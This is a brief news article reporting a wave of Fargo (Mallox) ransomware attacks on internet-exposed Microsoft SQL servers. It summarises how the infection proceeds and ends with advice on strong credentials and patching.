2 min

Cybersecurity experts warn of hackers exploiting and targeting vulnerabilities in Microsoft SQL servers exposed to the internet through a new wave of Fargo ransomware cyberattacks.

BleepingComputer informed users of a similar cyberattack on Microsoft SQL servers in February. Another wave occurred in July. Both attacks were based on Cobalt Strike.

Microsoft SQL servers typically serve as data management systems for companies, storing sensitive data related to numerous Internet apps and services. It’s one of the leading database management systems that powers both single-system and large-scale apps.

Sabotaging the security of SQL servers can lead to critical incidents. Hackers recently hijacked servers just to steal bandwidth for proxy services, initiating a new wave of attacks – an easy money-making technique of blackmailing and threatening database owners.

Fargo ransomware

Database servers are compromised using brute-force attacks against weak credentials. Additionally, vulnerabilities in unpatched systems increase the chance of being hacked. Victims are blackmailed with leaked files until they agree to pay the ransom.

According to ASEC’s security experts, Fargo is one of the most dangerous and popular forms of ransomware among attackers of Microsoft SQL servers. The ransomware variant is also known as Mallox, as it tends to attach the .mallox extension during file encryption.

Attack process

Fargo is a file-encrypting malware. The infection starts with Microsoft SQL processes. It compromises systems by downloading a .NET file with powershell.exe and cmd.exe extensions. The payload retrieves supplementary malware while generating and running a BAT file that ultimately terminates services and processes.

The ransomware automatically injects itself into the Windows process AppLaunche.exe and makes an attempt to erase the registry key used as a ransomware vaccine. It also performs recovery deactivation commands by terminating database-related processes. To keep the system from becoming completely unworkable, it won’t affect critical directories holding boot files, browsers and user customization.

In the end, the ransomware renames the locked files as ‘.Fargo3’ while generating a ransom note named ‘RECOVERYFILES.txt’. Experts recommended implementing strong and unique credentials, keeping your systems up-to-date and applying patches for security vulnerabilities.

Tip: Data protection is becoming more workload-specific (and software-defined)